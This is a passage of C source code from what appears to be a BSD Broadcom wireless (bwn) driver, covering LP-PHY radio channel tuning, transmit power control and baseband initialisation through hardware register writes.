BWN_B2062_S_LGENG_CTL1, bc->bc_data[4]); BWN_RF_WRITE(mac, BWN_B2062_N_LGENACTL5, bc->bc_data[5]); BWN_RF_WRITE(mac, BWN_B2062_N_LGENACTL6, bc->bc_data[6]); BWN_RF_WRITE(mac, BWN_B2062_N_TX_PGA, bc->bc_data[7]); BWN_RF_WRITE(mac, BWN_B2062_N_TX_PAD, bc->bc_data[8]); BWN_RF_WRITE(mac, BWN_B2062_S_RFPLLCTL33, 0xcc); BWN_RF_WRITE(mac, BWN_B2062_S_RFPLLCTL34, 0x07); bwn_phy_lp_b2062_reset_pllbias(mac); tmp[0] = freqxtal / 1000; tmp[1] = plp->plp_div * 1000; tmp[2] = tmp[1] * ieee80211_ieee2mhz(chan, 0); if (ieee80211_ieee2mhz(chan, 0) < 4000) tmp[2] *= 2; tmp[3] = 48 * tmp[0]; tmp[5] = tmp[2] / tmp[3]; tmp[6] = tmp[2] % tmp[3]; BWN_RF_WRITE(mac, BWN_B2062_S_RFPLLCTL26, tmp[5]); tmp[4] = tmp[6] * 0x100; tmp[5] = tmp[4] / tmp[3]; tmp[6] = tmp[4] % tmp[3]; BWN_RF_WRITE(mac, BWN_B2062_S_RFPLLCTL27, tmp[5]); tmp[4] = tmp[6] * 0x100; tmp[5] = tmp[4] / tmp[3]; tmp[6] = tmp[4] % tmp[3]; BWN_RF_WRITE(mac, BWN_B2062_S_RFPLLCTL28, tmp[5]); tmp[4] = tmp[6] * 0x100; tmp[5] = tmp[4] / tmp[3]; tmp[6] = tmp[4] % tmp[3]; BWN_RF_WRITE(mac, BWN_B2062_S_RFPLLCTL29, tmp[5] + ((2 * tmp[6]) / tmp[3])); tmp[7] = BWN_RF_READ(mac, BWN_B2062_S_RFPLLCTL19); tmp[8] = ((2 * tmp[2] * (tmp[7] + 1)) + (3 * tmp[0])) / (6 * tmp[0]); BWN_RF_WRITE(mac, BWN_B2062_S_RFPLLCTL23, (tmp[8] >> 8) + 16); BWN_RF_WRITE(mac, BWN_B2062_S_RFPLLCTL24, tmp[8] & 0xff); bwn_phy_lp_b2062_vco_calib(mac); if (BWN_RF_READ(mac, BWN_B2062_S_RFPLLCTL3) & 0x10) { BWN_RF_WRITE(mac, BWN_B2062_S_RFPLLCTL33, 0xfc); BWN_RF_WRITE(mac, BWN_B2062_S_RFPLLCTL34, 0); bwn_phy_lp_b2062_reset_pllbias(mac); bwn_phy_lp_b2062_vco_calib(mac); if (BWN_RF_READ(mac, BWN_B2062_S_RFPLLCTL3) & 0x10) { BWN_RF_MASK(mac, BWN_B2062_S_RFPLLCTL14, ~0x04); return (EIO); } } BWN_RF_MASK(mac, BWN_B2062_S_RFPLLCTL14, ~0x04); return (0); } static void bwn_phy_lp_set_anafilter(struct bwn_mac *mac, uint8_t channel) { struct bwn_phy_lp *plp = &mac->mac_phy.phy_lp; uint16_t tmp = (channel == 14); if (mac->mac_phy.rev < 2) { BWN_PHY_SETMASK(mac, BWN_PHY_LP_PHY_CTL, 0xfcff, tmp << 9); if ((mac->mac_phy.rev == 1) && (plp->plp_rccap)) bwn_phy_lp_set_rccap(mac); return; } BWN_RF_WRITE(mac, BWN_B2063_TX_BB_SP3, 0x3f); } static void bwn_phy_lp_set_gaintbl(struct bwn_mac *mac, uint32_t freq) { struct bwn_phy_lp *plp = &mac->mac_phy.phy_lp; struct bwn_softc *sc = mac->mac_sc; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; uint16_t iso, tmp[3]; KASSERT(mac->mac_phy.rev < 2, ("%s:%d: fail", __func__, __LINE__)); if (IEEE80211_IS_CHAN_2GHZ(ic->ic_curchan)) iso = plp->plp_txisoband_m; else if (freq <= 5320) iso = plp->plp_txisoband_l; else if (freq <= 5700) iso = plp->plp_txisoband_m; else iso = plp->plp_txisoband_h; tmp[0] = ((iso - 26) / 12) << 12; tmp[1] = tmp[0] + 0x1000; tmp[2] = tmp[0] + 0x2000; bwn_tab_write_multi(mac, BWN_TAB_2(13, 0), 3, tmp); bwn_tab_write_multi(mac, BWN_TAB_2(12, 0), 3, tmp); } static void bwn_phy_lp_digflt_save(struct bwn_mac *mac) { struct bwn_phy_lp *plp = &mac->mac_phy.phy_lp; int i; static const uint16_t addr[] = { BWN_PHY_OFDM(0xc1), BWN_PHY_OFDM(0xc2), BWN_PHY_OFDM(0xc3), BWN_PHY_OFDM(0xc4), BWN_PHY_OFDM(0xc5), BWN_PHY_OFDM(0xc6), BWN_PHY_OFDM(0xc7), BWN_PHY_OFDM(0xc8), BWN_PHY_OFDM(0xcf), }; static const uint16_t val[] = { 0xde5e, 0xe832, 0xe331, 0x4d26, 0x0026, 0x1420, 0x0020, 0xfe08, 0x0008, }; for (i = 0; i < N(addr); i++) { plp->plp_digfilt[i] = BWN_PHY_READ(mac, addr[i]); BWN_PHY_WRITE(mac, addr[i], val[i]); } } static void bwn_phy_lp_get_txpctlmode(struct bwn_mac *mac) { struct bwn_phy_lp *plp = &mac->mac_phy.phy_lp; struct bwn_softc *sc = mac->mac_sc; uint16_t ctl; ctl = BWN_PHY_READ(mac, BWN_PHY_TX_PWR_CTL_CMD); switch (ctl & BWN_PHY_TX_PWR_CTL_CMD_MODE) { case BWN_PHY_TX_PWR_CTL_CMD_MODE_OFF: plp->plp_txpctlmode = BWN_PHYLP_TXPCTL_OFF; break; case BWN_PHY_TX_PWR_CTL_CMD_MODE_SW: plp->plp_txpctlmode = BWN_PHYLP_TXPCTL_ON_SW; break; case BWN_PHY_TX_PWR_CTL_CMD_MODE_HW: plp->plp_txpctlmode = BWN_PHYLP_TXPCTL_ON_HW; break; default: plp->plp_txpctlmode = BWN_PHYLP_TXPCTL_UNKNOWN; device_printf(sc->sc_dev, "unknown command mode\n"); break; } } static void bwn_phy_lp_set_txpctlmode(struct bwn_mac *mac, uint8_t mode) { struct bwn_phy_lp *plp = &mac->mac_phy.phy_lp; uint16_t ctl; uint8_t old; bwn_phy_lp_get_txpctlmode(mac); old = plp->plp_txpctlmode; if (old == mode) return; plp->plp_txpctlmode = mode; if (old != BWN_PHYLP_TXPCTL_ON_HW && mode == BWN_PHYLP_TXPCTL_ON_HW) { BWN_PHY_SETMASK(mac, BWN_PHY_TX_PWR_CTL_CMD, 0xff80, plp->plp_tssiidx); BWN_PHY_SETMASK(mac, BWN_PHY_TX_PWR_CTL_NNUM, 0x8fff, ((uint16_t)plp->plp_tssinpt << 16)); /* disable TX GAIN override */ if (mac->mac_phy.rev < 2) BWN_PHY_MASK(mac, BWN_PHY_RF_OVERRIDE_2, 0xfeff); else { BWN_PHY_MASK(mac, BWN_PHY_RF_OVERRIDE_2, 0xff7f); BWN_PHY_MASK(mac, BWN_PHY_RF_OVERRIDE_2, 0xbfff); } BWN_PHY_MASK(mac, BWN_PHY_AFE_CTL_OVR, 0xffbf); plp->plp_txpwridx = -1; } if (mac->mac_phy.rev >= 2) { if (mode == BWN_PHYLP_TXPCTL_ON_HW) BWN_PHY_SET(mac, BWN_PHY_OFDM(0xd0), 0x2); else BWN_PHY_MASK(mac, BWN_PHY_OFDM(0xd0), 0xfffd); } /* writes TX Power Control mode */ switch (plp->plp_txpctlmode) { case BWN_PHYLP_TXPCTL_OFF: ctl = BWN_PHY_TX_PWR_CTL_CMD_MODE_OFF; break; case BWN_PHYLP_TXPCTL_ON_HW: ctl = BWN_PHY_TX_PWR_CTL_CMD_MODE_HW; break; case BWN_PHYLP_TXPCTL_ON_SW: ctl = BWN_PHY_TX_PWR_CTL_CMD_MODE_SW; break; default: ctl = 0; KASSERT(0 == 1, ("%s:%d: fail", __func__, __LINE__)); } BWN_PHY_SETMASK(mac, BWN_PHY_TX_PWR_CTL_CMD, (uint16_t)~BWN_PHY_TX_PWR_CTL_CMD_MODE, ctl); } static void bwn_phy_lp_bugfix(struct bwn_mac *mac) { struct bwn_phy_lp *plp = &mac->mac_phy.phy_lp; struct bwn_softc *sc = mac->mac_sc; const unsigned int size = 256; struct bwn_txgain tg; uint32_t rxcomp, txgain, coeff, rfpwr, *tabs; uint16_t tssinpt, tssiidx, value[2]; uint8_t mode; int8_t txpwridx; tabs = (uint32_t *)malloc(sizeof(uint32_t) * size, M_DEVBUF, M_NOWAIT | M_ZERO); if (tabs == NULL) { device_printf(sc->sc_dev, "failed to allocate buffer.\n"); return; } bwn_phy_lp_get_txpctlmode(mac); mode = plp->plp_txpctlmode; txpwridx = plp->plp_txpwridx; tssinpt = plp->plp_tssinpt; tssiidx = plp->plp_tssiidx; bwn_tab_read_multi(mac, (mac->mac_phy.rev < 2) ? BWN_TAB_4(10, 0x140) : BWN_TAB_4(7, 0x140), size, tabs); bwn_phy_lp_tblinit(mac); bwn_phy_lp_bbinit(mac); bwn_phy_lp_txpctl_init(mac); bwn_phy_lp_rf_onoff(mac, 1); bwn_phy_lp_set_txpctlmode(mac, BWN_PHYLP_TXPCTL_OFF); bwn_tab_write_multi(mac, (mac->mac_phy.rev < 2) ? BWN_TAB_4(10, 0x140) : BWN_TAB_4(7, 0x140), size, tabs); BWN_WRITE_2(mac, BWN_CHANNEL, plp->plp_chan); plp->plp_tssinpt = tssinpt; plp->plp_tssiidx = tssiidx; bwn_phy_lp_set_anafilter(mac, plp->plp_chan); if (txpwridx != -1) { /* set TX power by index */ plp->plp_txpwridx = txpwridx; bwn_phy_lp_get_txpctlmode(mac); if (plp->plp_txpctlmode != BWN_PHYLP_TXPCTL_OFF) bwn_phy_lp_set_txpctlmode(mac, BWN_PHYLP_TXPCTL_ON_SW); if (mac->mac_phy.rev >= 2) { rxcomp = bwn_tab_read(mac, BWN_TAB_4(7, txpwridx + 320)); txgain = bwn_tab_read(mac, BWN_TAB_4(7, txpwridx + 192)); tg.tg_pad = (txgain >> 16) & 0xff; tg.tg_gm = txgain & 0xff; tg.tg_pga = (txgain >> 8) & 0xff; tg.tg_dac = (rxcomp >> 28) & 0xff; bwn_phy_lp_set_txgain(mac, &tg); } else { rxcomp = bwn_tab_read(mac, BWN_TAB_4(10, txpwridx + 320)); txgain = bwn_tab_read(mac, BWN_TAB_4(10, txpwridx + 192)); BWN_PHY_SETMASK(mac, BWN_PHY_TX_GAIN_CTL_OVERRIDE_VAL, 0xf800, (txgain >> 4) & 0x7fff); bwn_phy_lp_set_txgain_dac(mac, txgain & 0x7); bwn_phy_lp_set_txgain_pa(mac, (txgain >> 24) & 0x7f); } bwn_phy_lp_set_bbmult(mac, (rxcomp >> 20) & 0xff); /* set TX IQCC */ value[0] = (rxcomp >> 10) & 0x3ff; value[1] = rxcomp & 0x3ff; bwn_tab_write_multi(mac, BWN_TAB_2(0, 80), 2, value); coeff = bwn_tab_read(mac, (mac->mac_phy.rev >= 2) ? BWN_TAB_4(7, txpwridx + 448) : BWN_TAB_4(10, txpwridx + 448)); bwn_tab_write(mac, BWN_TAB_2(0, 85), coeff & 0xffff); if (mac->mac_phy.rev >= 2) { rfpwr = bwn_tab_read(mac, BWN_TAB_4(7, txpwridx + 576)); BWN_PHY_SETMASK(mac, BWN_PHY_RF_PWR_OVERRIDE, 0xff00, rfpwr & 0xffff); } bwn_phy_lp_set_txgain_override(mac); } if (plp->plp_rccap) bwn_phy_lp_set_rccap(mac); bwn_phy_lp_set_antenna(mac, plp->plp_antenna); bwn_phy_lp_set_txpctlmode(mac, mode); free(tabs, M_DEVBUF); } static void bwn_phy_lp_digflt_restore(struct bwn_mac *mac) { struct bwn_phy_lp *plp = &mac->mac_phy.phy_lp; int i; static const uint16_t addr[] = { BWN_PHY_OFDM(0xc1), BWN_PHY_OFDM(0xc2), BWN_PHY_OFDM(0xc3), BWN_PHY_OFDM(0xc4), BWN_PHY_OFDM(0xc5), BWN_PHY_OFDM(0xc6), BWN_PHY_OFDM(0xc7), BWN_PHY_OFDM(0xc8), BWN_PHY_OFDM(0xcf), }; for (i = 0; i < N(addr); i++) BWN_PHY_WRITE(mac, addr[i], plp->plp_digfilt[i]); } static void bwn_phy_lp_tblinit(struct bwn_mac *mac) { uint32_t freq = ieee80211_ieee2mhz(bwn_phy_lp_get_default_chan(mac), 0); if (mac->mac_phy.rev < 2) { bwn_phy_lp_tblinit_r01(mac); bwn_phy_lp_tblinit_txgain(mac); bwn_phy_lp_set_gaintbl(mac, freq); return; } bwn_phy_lp_tblinit_r2(mac); bwn_phy_lp_tblinit_txgain(mac); } struct bwn_wpair { uint16_t reg; uint16_t value; }; struct bwn_smpair { uint16_t offset; uint16_t mask; uint16_t set; }; static void bwn_phy_lp_bbinit_r2(struct bwn_mac *mac) { struct bwn_phy_lp *plp = &mac->mac_phy.phy_lp; struct bwn_softc *sc = mac->mac_sc; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; static const struct bwn_wpair v1[] = { { BWN_PHY_AFE_DAC_CTL, 0x50 }, { BWN_PHY_AFE_CTL, 0x8800 }, { BWN_PHY_AFE_CTL_OVR, 0 }, { BWN_PHY_AFE_CTL_OVRVAL, 0 }, { BWN_PHY_RF_OVERRIDE_0, 0 }, { BWN_PHY_RF_OVERRIDE_2, 0 }, { BWN_PHY_OFDM(0xf9), 0 }, { BWN_PHY_TR_LOOKUP_1, 0 } }; static const struct bwn_smpair v2[] = { { BWN_PHY_OFDMSYNCTHRESH0, 0xff00, 0xb4 }, { BWN_PHY_DCOFFSETTRANSIENT, 0xf8ff, 0x200 }, { BWN_PHY_DCOFFSETTRANSIENT, 0xff00, 0x7f }, { BWN_PHY_GAINDIRECTMISMATCH, 0xff0f, 0x40 }, { BWN_PHY_PREAMBLECONFIRMTO, 0xff00, 0x2 } }; static const struct bwn_smpair v3[] = { { BWN_PHY_OFDM(0xfe), 0xffe0, 0x1f }, { BWN_PHY_OFDM(0xff), 0xffe0, 0xc }, { BWN_PHY_OFDM(0x100), 0xff00, 0x19 }, { BWN_PHY_OFDM(0xff), 0x03ff, 0x3c00 }, { BWN_PHY_OFDM(0xfe), 0xfc1f, 0x3e0 }, { BWN_PHY_OFDM(0xff), 0xffe0, 0xc }, { BWN_PHY_OFDM(0x100), 0x00ff, 0x1900 }, { BWN_PHY_CLIPCTRTHRESH, 0x83ff, 0x5800 }, { BWN_PHY_CLIPCTRTHRESH, 0xffe0, 0x12 }, { BWN_PHY_GAINMISMATCH, 0x0fff, 0x9000 }, }; int i; for (i = 0; i < N(v1); i++) BWN_PHY_WRITE(mac, v1[i].reg, v1[i].value); BWN_PHY_SET(mac, BWN_PHY_ADC_COMPENSATION_CTL, 0x10); for (i = 0; i < N(v2); i++) BWN_PHY_SETMASK(mac, v2[i].offset, v2[i].mask, v2[i].set); BWN_PHY_MASK(mac, BWN_PHY_CRSGAIN_CTL, ~0x4000); BWN_PHY_MASK(mac, BWN_PHY_CRSGAIN_CTL, ~0x2000); BWN_PHY_SET(mac, BWN_PHY_OFDM(0x10a), 0x1); if (siba_get_pci_revid(sc->sc_dev) >= 0x18) { bwn_tab_write(mac, BWN_TAB_4(17, 65), 0xec); BWN_PHY_SETMASK(mac, BWN_PHY_OFDM(0x10a), 0xff01, 0x14); } else { BWN_PHY_SETMASK(mac, BWN_PHY_OFDM(0x10a), 0xff01, 0x10); } BWN_PHY_SETMASK(mac, BWN_PHY_OFDM(0xdf), 0xff00, 0xf4); BWN_PHY_SETMASK(mac, BWN_PHY_OFDM(0xdf), 0x00ff, 0xf100); BWN_PHY_WRITE(mac, BWN_PHY_CLIPTHRESH, 0x48); BWN_PHY_SETMASK(mac, BWN_PHY_HIGAINDB, 0xff00, 0x46); BWN_PHY_SETMASK(mac, BWN_PHY_OFDM(0xe4), 0xff00, 0x10); BWN_PHY_SETMASK(mac, BWN_PHY_PWR_THRESH1, 0xfff0, 0x9); BWN_PHY_MASK(mac, BWN_PHY_GAINDIRECTMISMATCH, ~0xf); BWN_PHY_SETMASK(mac, BWN_PHY_VERYLOWGAINDB, 0x00ff, 0x5500); BWN_PHY_SETMASK(mac, BWN_PHY_CLIPCTRTHRESH, 0xfc1f, 0xa0); BWN_PHY_SETMASK(mac, BWN_PHY_GAINDIRECTMISMATCH, 0xe0ff, 0x300); BWN_PHY_SETMASK(mac, BWN_PHY_HIGAINDB, 0x00ff, 0x2a00); if ((siba_get_chipid(sc->sc_dev) == 0x4325) && (siba_get_chiprev(sc->sc_dev) == 0)) { BWN_PHY_SETMASK(mac, BWN_PHY_LOWGAINDB, 0x00ff, 0x2100); BWN_PHY_SETMASK(mac, BWN_PHY_VERYLOWGAINDB, 0xff00, 0xa); } else { BWN_PHY_SETMASK(mac, BWN_PHY_LOWGAINDB, 0x00ff, 0x1e00); BWN_PHY_SETMASK(mac, BWN_PHY_VERYLOWGAINDB, 0xff00, 0xd); } for (i = 0; i < N(v3); i++) BWN_PHY_SETMASK(mac, v3[i].offset, v3[i].mask, v3[i].set); if ((siba_get_chipid(sc->sc_dev) == 0x4325) && (siba_get_chiprev(sc->sc_dev) == 0)) { bwn_tab_write(mac, BWN_TAB_2(0x08, 0x14), 0); bwn_tab_write(mac, BWN_TAB_2(0x08, 0x12), 0x40); } if (IEEE80211_IS_CHAN_2GHZ(ic->ic_curchan)) { BWN_PHY_SET(mac, BWN_PHY_CRSGAIN_CTL, 0x40); BWN_PHY_SETMASK(mac, BWN_PHY_CRSGAIN_CTL, 0xf0ff, 0xb00); BWN_PHY_SETMASK(mac, BWN_PHY_SYNCPEAKCNT, 0xfff8, 0x6); BWN_PHY_SETMASK(mac, BWN_PHY_MINPWR_LEVEL, 0x00ff, 0x9d00); BWN_PHY_SETMASK(mac, BWN_PHY_MINPWR_LEVEL, 0xff00, 0xa1); BWN_PHY_MASK(mac, BWN_PHY_IDLEAFTERPKTRXTO, 0x00ff); } else BWN_PHY_MASK(mac, BWN_PHY_CRSGAIN_CTL, ~0x40); BWN_PHY_SETMASK(mac, BWN_PHY_CRS_ED_THRESH, 0xff00, 0xb3); BWN_PHY_SETMASK(mac, BWN_PHY_CRS_ED_THRESH, 0x00ff, 0xad00); BWN_PHY_SETMASK(mac, BWN_PHY_INPUT_PWRDB, 0xff00, plp->plp_rxpwroffset); BWN_PHY_SET(mac, BWN_PHY_RESET_CTL, 0x44); BWN_PHY_WRITE(mac, BWN_PHY_RESET_CTL, 0x80); BWN_PHY_WRITE(mac, BWN_PHY_AFE_RSSI_CTL_0, 0xa954); BWN_PHY_WRITE(mac, BWN_PHY_AFE_RSSI_CTL_1, 0x2000 | ((uint16_t)plp->plp_rssigs << 10) | ((uint16_t)plp->plp_rssivc << 4) | plp->plp_rssivf); if ((siba_get_chipid(sc->sc_dev) == 0x4325) && (siba_get_chiprev(sc->sc_dev) == 0)) { BWN_PHY_SET(mac, BWN_PHY_AFE_ADC_CTL_0, 0x1c); BWN_PHY_SETMASK(mac, BWN_PHY_AFE_CTL, 0x00ff, 0x8800); BWN_PHY_SETMASK(mac, BWN_PHY_AFE_ADC_CTL_1, 0xfc3c, 0x0400); } bwn_phy_lp_digflt_save(mac); } static void bwn_phy_lp_bbinit_r01(struct bwn_mac *mac) { struct bwn_phy_lp *plp = &mac->mac_phy.phy_lp; struct bwn_softc *sc = mac->mac_sc; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; static const struct bwn_smpair v1[] = { { BWN_PHY_CLIPCTRTHRESH, 0xffe0, 0x0005 }, { BWN_PHY_CLIPCTRTHRESH, 0xfc1f, 0x0180 }, { BWN_PHY_CLIPCTRTHRESH, 0x83ff, 0x3c00 }, { BWN_PHY_GAINDIRECTMISMATCH, 0xfff0, 0x0005 }, { BWN_PHY_GAIN_MISMATCH_LIMIT, 0xffc0, 0x001a }, { BWN_PHY_CRS_ED_THRESH, 0xff00, 0x00b3 }, { BWN_PHY_CRS_ED_THRESH, 0x00ff, 0xad00 } }; static const struct bwn_smpair v2[] = { { BWN_PHY_TR_LOOKUP_1, 0xffc0, 0x000a }, { BWN_PHY_TR_LOOKUP_1, 0x3f00, 0x0900 }, { BWN_PHY_TR_LOOKUP_2, 0xffc0, 0x000a }, { BWN_PHY_TR_LOOKUP_2, 0xc0ff, 0x0b00 }, { BWN_PHY_TR_LOOKUP_3, 0xffc0, 0x000a }, { BWN_PHY_TR_LOOKUP_3, 0xc0ff, 0x0400 }, { BWN_PHY_TR_LOOKUP_4, 0xffc0, 0x000a }, { BWN_PHY_TR_LOOKUP_4, 0xc0ff, 0x0b00 }, { BWN_PHY_TR_LOOKUP_5, 0xffc0, 0x000a }, { BWN_PHY_TR_LOOKUP_5, 0xc0ff, 0x0900 }, { BWN_PHY_TR_LOOKUP_6, 0xffc0, 0x000a }, { BWN_PHY_TR_LOOKUP_6, 0xc0ff, 0x0b00 }, { BWN_PHY_TR_LOOKUP_7, 0xffc0, 0x000a }, { BWN_PHY_TR_LOOKUP_7, 0xc0ff, 0x0900 }, { BWN_PHY_TR_LOOKUP_8, 0xffc0, 0x000a }, { BWN_PHY_TR_LOOKUP_8, 0xc0ff, 0x0b00 } }; static const struct bwn_smpair v3[] = { { BWN_PHY_TR_LOOKUP_1, 0xffc0, 0x0001 }, { BWN_PHY_TR_LOOKUP_1, 0xc0ff, 0x0400 }, { BWN_PHY_TR_LOOKUP_2, 0xffc0, 0x0001 }, { BWN_PHY_TR_LOOKUP_2, 0xc0ff, 0x0500 }, { BWN_PHY_TR_LOOKUP_3, 0xffc0, 0x0002 }, { BWN_PHY_TR_LOOKUP_3, 0xc0ff, 0x0800 }, { BWN_PHY_TR_LOOKUP_4, 0xffc0, 0x0002 }, { BWN_PHY_TR_LOOKUP_4, 0xc0ff, 0x0a00 } }; static const struct bwn_smpair v4[] = { { BWN_PHY_TR_LOOKUP_1, 0xffc0, 0x0004 }, { BWN_PHY_TR_LOOKUP_1, 0xc0ff, 0x0800 }, { BWN_PHY_TR_LOOKUP_2, 0xffc0, 0x0004 }, { BWN_PHY_TR_LOOKUP_2, 0xc0ff, 0x0c00 }, { BWN_PHY_TR_LOOKUP_3, 0xffc0, 0x0002 }, { BWN_PHY_TR_LOOKUP_3, 0xc0ff, 0x0100 }, { BWN_PHY_TR_LOOKUP_4, 0xffc0, 0x0002 }, { BWN_PHY_TR_LOOKUP_4, 0xc0ff, 0x0300 } }; static const struct bwn_smpair v5[] = { { BWN_PHY_TR_LOOKUP_1, 0xffc0, 0x000a }, { BWN_PHY_TR_LOOKUP_1, 0xc0ff, 0x0900 }, { BWN_PHY_TR_LOOKUP_2, 0xffc0, 0x000a }, { BWN_PHY_TR_LOOKUP_2, 0xc0ff, 0x0b00 }, { BWN_PHY_TR_LOOKUP_3, 0xffc0, 0x0006 }, { BWN_PHY_TR_LOOKUP_3, 0xc0ff, 0x0500 }, { BWN_PHY_TR_LOOKUP_4, 0xffc0, 0x0006 }, { BWN_PHY_TR_LOOKUP_4, 0xc0ff, 0x0700 } }; int i; uint16_t tmp, tmp2; BWN_PHY_MASK(mac, BWN_PHY_AFE_DAC_CTL, 0xf7ff); BWN_PHY_WRITE(mac, BWN_PHY_AFE_CTL, 0); BWN_PHY_WRITE(mac, BWN_PHY_AFE_CTL_OVR, 0); BWN_PHY_WRITE(mac, BWN_PHY_RF_OVERRIDE_0, 0); BWN_PHY_WRITE(mac, BWN_PHY_RF_OVERRIDE_2, 0); BWN_PHY_SET(mac, BWN_PHY_AFE_DAC_CTL, 0x0004); BWN_PHY_SETMASK(mac, BWN_PHY_OFDMSYNCTHRESH0, 0xff00, 0x0078); BWN_PHY_SETMASK(mac, BWN_PHY_CLIPCTRTHRESH, 0x83ff, 0x5800); BWN_PHY_WRITE(mac, BWN_PHY_ADC_COMPENSATION_CTL, 0x0016); BWN_PHY_SETMASK(mac, BWN_PHY_AFE_ADC_CTL_0, 0xfff8, 0x0004); BWN_PHY_SETMASK(mac, BWN_PHY_VERYLOWGAINDB, 0x00ff, 0x5400); BWN_PHY_SETMASK(mac, BWN_PHY_HIGAINDB, 0x00ff, 0x2400); BWN_PHY_SETMASK(mac, BWN_PHY_LOWGAINDB, 0x00ff, 0x2100); BWN_PHY_SETMASK(mac, BWN_PHY_VERYLOWGAINDB, 0xff00, 0x0006); BWN_PHY_MASK(mac, BWN_PHY_RX_RADIO_CTL, 0xfffe); for (i = 0; i < N(v1); i++) BWN_PHY_SETMASK(mac, v1[i].offset, v1[i].mask, v1[i].set); BWN_PHY_SETMASK(mac, BWN_PHY_INPUT_PWRDB, 0xff00, plp->plp_rxpwroffset); if ((siba_sprom_get_bf_lo(sc->sc_dev) & BWN_BFL_FEM) && ((IEEE80211_IS_CHAN_5GHZ(ic->ic_curchan)) || (siba_sprom_get_bf_hi(sc->sc_dev) & BWN_BFH_LDO_PAREF))) { siba_cc_pmu_set_ldovolt(sc->sc_dev, SIBA_LDO_PAREF, 0x28); siba_cc_pmu_set_ldoparef(sc->sc_dev, 1); if (mac->mac_phy.rev == 0) BWN_PHY_SETMASK(mac, BWN_PHY_LP_RF_SIGNAL_LUT, 0xffcf, 0x0010); bwn_tab_write(mac, BWN_TAB_2(11, 7), 60); } else { siba_cc_pmu_set_ldoparef(sc->sc_dev, 0); BWN_PHY_SETMASK(mac, BWN_PHY_LP_RF_SIGNAL_LUT, 0xffcf, 0x0020); bwn_tab_write(mac, BWN_TAB_2(11, 7), 100); } tmp = plp->plp_rssivf | plp->plp_rssivc << 4 | 0xa000; BWN_PHY_WRITE(mac, BWN_PHY_AFE_RSSI_CTL_0, tmp); if (siba_sprom_get_bf_hi(sc->sc_dev) & BWN_BFH_RSSIINV) BWN_PHY_SETMASK(mac, BWN_PHY_AFE_RSSI_CTL_1, 0xf000, 0x0aaa); else BWN_PHY_SETMASK(mac, BWN_PHY_AFE_RSSI_CTL_1, 0xf000, 0x02aa); bwn_tab_write(mac, BWN_TAB_2(11, 1), 24); BWN_PHY_SETMASK(mac, BWN_PHY_RX_RADIO_CTL, 0xfff9, (plp->plp_bxarch << 1)); if (mac->mac_phy.rev == 1 && (siba_sprom_get_bf_hi(sc->sc_dev) & BWN_BFH_FEM_BT)) { for (i = 0; i < N(v2); i++) BWN_PHY_SETMASK(mac, v2[i].offset, v2[i].mask, v2[i].set); } else if (IEEE80211_IS_CHAN_5GHZ(ic->ic_curchan) || (siba_get_pci_subdevice(sc->sc_dev) == 0x048a) || ((mac->mac_phy.rev == 0) && (siba_sprom_get_bf_lo(sc->sc_dev) & BWN_BFL_FEM))) { for (i = 0; i < N(v3); i++) BWN_PHY_SETMASK(mac, v3[i].offset, v3[i].mask, v3[i].set); } else if (mac->mac_phy.rev == 1 || (siba_sprom_get_bf_lo(sc->sc_dev) & BWN_BFL_FEM)) { for (i = 0; i < N(v4); i++) BWN_PHY_SETMASK(mac, v4[i].offset, v4[i].mask, v4[i].set); } else { for (i = 0; i < N(v5); i++) BWN_PHY_SETMASK(mac, v5[i].offset, v5[i].mask, v5[i].set); } if (mac->mac_phy.rev == 1 && (siba_sprom_get_bf_hi(sc->sc_dev) & BWN_BFH_LDO_PAREF)) { BWN_PHY_COPY(mac, BWN_PHY_TR_LOOKUP_5, BWN_PHY_TR_LOOKUP_1); BWN_PHY_COPY(mac, BWN_PHY_TR_LOOKUP_6, BWN_PHY_TR_LOOKUP_2); BWN_PHY_COPY(mac, BWN_PHY_TR_LOOKUP_7, BWN_PHY_TR_LOOKUP_3); BWN_PHY_COPY(mac, BWN_PHY_TR_LOOKUP_8, BWN_PHY_TR_LOOKUP_4); } if ((siba_sprom_get_bf_hi(sc->sc_dev) & BWN_BFH_FEM_BT) && (siba_get_chipid(sc->sc_dev) == 0x5354) && (siba_get_chippkg(sc->sc_dev) == SIBA_CHIPPACK_BCM4712S)) { BWN_PHY_SET(mac, BWN_PHY_CRSGAIN_CTL, 0x0006); BWN_PHY_WRITE(mac, BWN_PHY_GPIO_SELECT, 0x0005); BWN_PHY_WRITE(mac, BWN_PHY_GPIO_OUTEN, 0xffff); bwn_hf_write(mac, bwn_hf_read(mac) | BWN_HF_PR45960W); } if (IEEE80211_IS_CHAN_2GHZ(ic->ic_curchan)) { BWN_PHY_SET(mac, BWN_PHY_LP_PHY_CTL, 0x8000); BWN_PHY_SET(mac, BWN_PHY_CRSGAIN_CTL, 0x0040); BWN_PHY_SETMASK(mac, BWN_PHY_MINPWR_LEVEL, 0x00ff, 0xa400); BWN_PHY_SETMASK(mac, BWN_PHY_CRSGAIN_CTL, 0xf0ff, 0x0b00); BWN_PHY_SETMASK(mac, BWN_PHY_SYNCPEAKCNT, 0xfff8, 0x0007); BWN_PHY_SETMASK(mac, BWN_PHY_DSSS_CONFIRM_CNT, 0xfff8, 0x0003); BWN_PHY_SETMASK(mac, BWN_PHY_DSSS_CONFIRM_CNT, 0xffc7, 0x0020); BWN_PHY_MASK(mac, BWN_PHY_IDLEAFTERPKTRXTO, 0x00ff); } else { BWN_PHY_MASK(mac, BWN_PHY_LP_PHY_CTL, 0x7fff); BWN_PHY_MASK(mac, BWN_PHY_CRSGAIN_CTL, 0xffbf); } if (mac->mac_phy.rev == 1) { tmp = BWN_PHY_READ(mac, BWN_PHY_CLIPCTRTHRESH); tmp2 = (tmp & 0x03e0) >> 5; tmp2 |= tmp2 << 5; BWN_PHY_WRITE(mac, BWN_PHY_4C3, tmp2); tmp = BWN_PHY_READ(mac, BWN_PHY_GAINDIRECTMISMATCH); tmp2 = (tmp & 0x1f00) >> 8; tmp2 |= tmp2 << 5; BWN_PHY_WRITE(mac, BWN_PHY_4C4, tmp2); tmp = BWN_PHY_READ(mac, BWN_PHY_VERYLOWGAINDB); tmp2 = tmp & 0x00ff; tmp2 |= tmp << 8; BWN_PHY_WRITE(mac, BWN_PHY_4C5, tmp2); } } struct bwn_b2062_freq { uint16_t freq; uint8_t value[6]; }; static void bwn_phy_lp_b2062_init(struct bwn_mac *mac) { #define CALC_CTL7(freq, div) \ (((800000000 * (div) + 